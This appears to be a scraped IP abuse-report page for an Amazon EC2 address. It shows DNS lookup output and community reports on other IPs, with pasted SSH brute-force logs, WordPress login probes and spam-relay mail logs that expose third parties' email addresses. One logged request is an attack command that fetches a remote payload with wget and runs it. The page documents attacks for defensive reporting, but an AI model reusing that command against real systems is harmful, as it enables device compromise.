Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: Boardman

Region: Oregon

Country: United States

Internet Service Provider: Amazon Technologies Inc.

Hostname: unknown

Organization: Amazon.com, Inc.

Usage Type: Data Center/Web Hosting/Transit

Comments:
Type Details Datetime
attackbots
tcp 2004
2019-09-05 02:00:41
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 52.42.65.90
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14841
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;52.42.65.90.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019090401 1800 900 604800 86400

;; Query time: 3 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Thu Sep 05 02:00:36 CST 2019
;; MSG SIZE  rcvd: 115
Host info
90.65.42.52.in-addr.arpa domain name pointer ec2-52-42-65-90.us-west-2.compute.amazonaws.com.
Nslookup info:
Server:		67.207.67.2
Address:	67.207.67.2#53

Non-authoritative answer:
90.65.42.52.in-addr.arpa	name = ec2-52-42-65-90.us-west-2.compute.amazonaws.com.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
62.234.146.92 attackspam
Mar 13 03:44:51 gw1 sshd[28993]: Failed password for root from 62.234.146.92 port 44890 ssh2
...
2020-03-13 08:58:41
14.21.42.158 attackspambots
IP blocked
2020-03-13 08:49:12
92.101.232.242 attack
2020-03-1222:04:171jCV05-0005Bx-3f\<=info@whatsup2013.chH=\(localhost\)[183.89.238.6]:57159P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2303id=D2D7613239EDC370ACA9E058ACB030AC@whatsup2013.chT="fromDarya"fornikhidoppalapudi9010@gmail.comuniquenick0.0@gmail.com2020-03-1222:04:471jCV0Z-0005GT-II\<=info@whatsup2013.chH=ip92-101-232-242.onego.ru\(localhost\)[92.101.232.242]:41255P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2371id=F5F046151ECAE4578B8EC77F8B44F4C0@whatsup2013.chT="fromDarya"forbadass4x4_530@yahoo.comrich.tomes@hotmail.com2020-03-1222:05:051jCV0o-0005H1-Ar\<=info@whatsup2013.chH=\(localhost\)[183.89.215.23]:53033P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2320id=A6A315464D99B704D8DD942CD8FAB76E@whatsup2013.chT="fromDarya"forjs4111628@gmail.comcraigbarry452@gmail.com2020-03-1222:06:351jCV2I-0005Oh-9N\<=info@whatsup2013.chH=\(localhost\)[14.168.231.211]:52031P
2020-03-13 09:19:18
49.233.134.31 attackbots
Mar 12 22:02:10 mail sshd\[30520\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.233.134.31  user=root
Mar 12 22:02:12 mail sshd\[30520\]: Failed password for root from 49.233.134.31 port 37590 ssh2
Mar 12 22:06:35 mail sshd\[30566\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.233.134.31  user=root
...
2020-03-13 09:20:08
183.89.215.23 attack
2020-03-1222:04:171jCV05-0005Bx-3f\<=info@whatsup2013.chH=\(localhost\)[183.89.238.6]:57159P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2303id=D2D7613239EDC370ACA9E058ACB030AC@whatsup2013.chT="fromDarya"fornikhidoppalapudi9010@gmail.comuniquenick0.0@gmail.com2020-03-1222:04:471jCV0Z-0005GT-II\<=info@whatsup2013.chH=ip92-101-232-242.onego.ru\(localhost\)[92.101.232.242]:41255P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2371id=F5F046151ECAE4578B8EC77F8B44F4C0@whatsup2013.chT="fromDarya"forbadass4x4_530@yahoo.comrich.tomes@hotmail.com2020-03-1222:05:051jCV0o-0005H1-Ar\<=info@whatsup2013.chH=\(localhost\)[183.89.215.23]:53033P=esmtpsaX=TLS1.2:ECDHE-RSA-AES256-GCM-SHA384:256CV=noA=dovecot_login:info@whatsup2013.chS=2320id=A6A315464D99B704D8DD942CD8FAB76E@whatsup2013.chT="fromDarya"forjs4111628@gmail.comcraigbarry452@gmail.com2020-03-1222:06:351jCV2I-0005Oh-9N\<=info@whatsup2013.chH=\(localhost\)[14.168.231.211]:52031P
2020-03-13 09:16:54
104.167.106.40 attackspambots
port
2020-03-13 08:44:12
190.146.184.215 attackbots
2020-03-12T22:58:45.833889randservbullet-proofcloud-66.localdomain sshd[15624]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.146.184.215  user=root
2020-03-12T22:58:47.792545randservbullet-proofcloud-66.localdomain sshd[15624]: Failed password for root from 190.146.184.215 port 42214 ssh2
2020-03-12T23:10:30.622687randservbullet-proofcloud-66.localdomain sshd[15688]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.146.184.215  user=root
2020-03-12T23:10:32.696957randservbullet-proofcloud-66.localdomain sshd[15688]: Failed password for root from 190.146.184.215 port 49430 ssh2
...
2020-03-13 08:54:16
122.51.98.140 attackbotsspam
Mar 11 09:30:40 mailrelay sshd[2332]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.51.98.140  user=r.r
Mar 11 09:30:42 mailrelay sshd[2332]: Failed password for r.r from 122.51.98.140 port 32976 ssh2
Mar 11 09:30:43 mailrelay sshd[2332]: Received disconnect from 122.51.98.140 port 32976:11: Bye Bye [preauth]
Mar 11 09:30:43 mailrelay sshd[2332]: Disconnected from 122.51.98.140 port 32976 [preauth]
Mar 11 09:36:45 mailrelay sshd[2456]: Invalid user em3-user from 122.51.98.140 port 41144
Mar 11 09:36:45 mailrelay sshd[2456]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.51.98.140
Mar 11 09:36:48 mailrelay sshd[2456]: Failed password for invalid user em3-user from 122.51.98.140 port 41144 ssh2
Mar 11 09:36:48 mailrelay sshd[2456]: Received disconnect from 122.51.98.140 port 41144:11: Bye Bye [preauth]
Mar 11 09:36:48 mailrelay sshd[2456]: Disconnected from 122.51.98.140 port 41144 ........
-------------------------------
2020-03-13 08:55:53
142.93.239.190 attackspambots
SSH brute force
2020-03-13 08:58:57
167.172.49.241 attackspam
Mar 11 16:24:43 scivo sshd[28400]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.49.241  user=r.r
Mar 11 16:24:45 scivo sshd[28400]: Failed password for r.r from 167.172.49.241 port 37682 ssh2
Mar 11 16:24:45 scivo sshd[28400]: Received disconnect from 167.172.49.241: 11: Bye Bye [preauth]
Mar 11 16:39:37 scivo sshd[29266]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.49.241  user=r.r
Mar 11 16:39:39 scivo sshd[29266]: Failed password for r.r from 167.172.49.241 port 36484 ssh2
Mar 11 16:39:39 scivo sshd[29266]: Received disconnect from 167.172.49.241: 11: Bye Bye [preauth]
Mar 11 16:45:15 scivo sshd[29585]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.172.49.241  user=r.r
Mar 11 16:45:17 scivo sshd[29585]: Failed password for r.r from 167.172.49.241 port 57180 ssh2
Mar 11 16:45:17 scivo sshd[29585]: Received disconnect from........
-------------------------------
2020-03-13 08:46:37
88.247.35.60 attackbots
firewall-block, port(s): 23/tcp
2020-03-13 09:00:13
91.121.175.61 attackspam
Mar 13 00:02:28 jane sshd[4131]: Failed password for root from 91.121.175.61 port 58238 ssh2
...
2020-03-13 09:15:07
94.8.99.234 attackbotsspam
ENG,DEF GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE
2020-03-13 09:11:46
180.250.115.93 attackspambots
Mar 13 01:25:20 srv206 sshd[672]: Invalid user git from 180.250.115.93
Mar 13 01:25:20 srv206 sshd[672]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=180.250.115.93
Mar 13 01:25:20 srv206 sshd[672]: Invalid user git from 180.250.115.93
Mar 13 01:25:22 srv206 sshd[672]: Failed password for invalid user git from 180.250.115.93 port 47299 ssh2
...
2020-03-13 09:06:28
202.44.54.48 attack
202.44.54.48 - - \[12/Mar/2020:22:06:39 +0100\] "POST /wp-login.php HTTP/1.0" 200 6517 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0"
202.44.54.48 - - \[12/Mar/2020:22:06:41 +0100\] "POST /wp-login.php HTTP/1.0" 200 6495 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0"
202.44.54.48 - - \[12/Mar/2020:22:06:42 +0100\] "POST /xmlrpc.php HTTP/1.0" 200 736 "-" "Mozilla/5.0 \(X11\; Ubuntu\; Linux x86_64\; rv:62.0\) Gecko/20100101 Firefox/62.0"
2020-03-13 09:12:06

Recently Reported IPs

196.85.149.13 119.213.160.188 72.87.60.68 123.216.101.240
86.61.141.170 219.143.15.190 191.217.175.42 168.174.72.188
113.29.6.67 107.102.56.181 53.233.216.217 119.76.97.139
106.52.93.188 103.41.40.240 42.88.140.121 208.6.215.116
80.151.219.189 167.200.82.116 202.235.172.158 88.165.243.101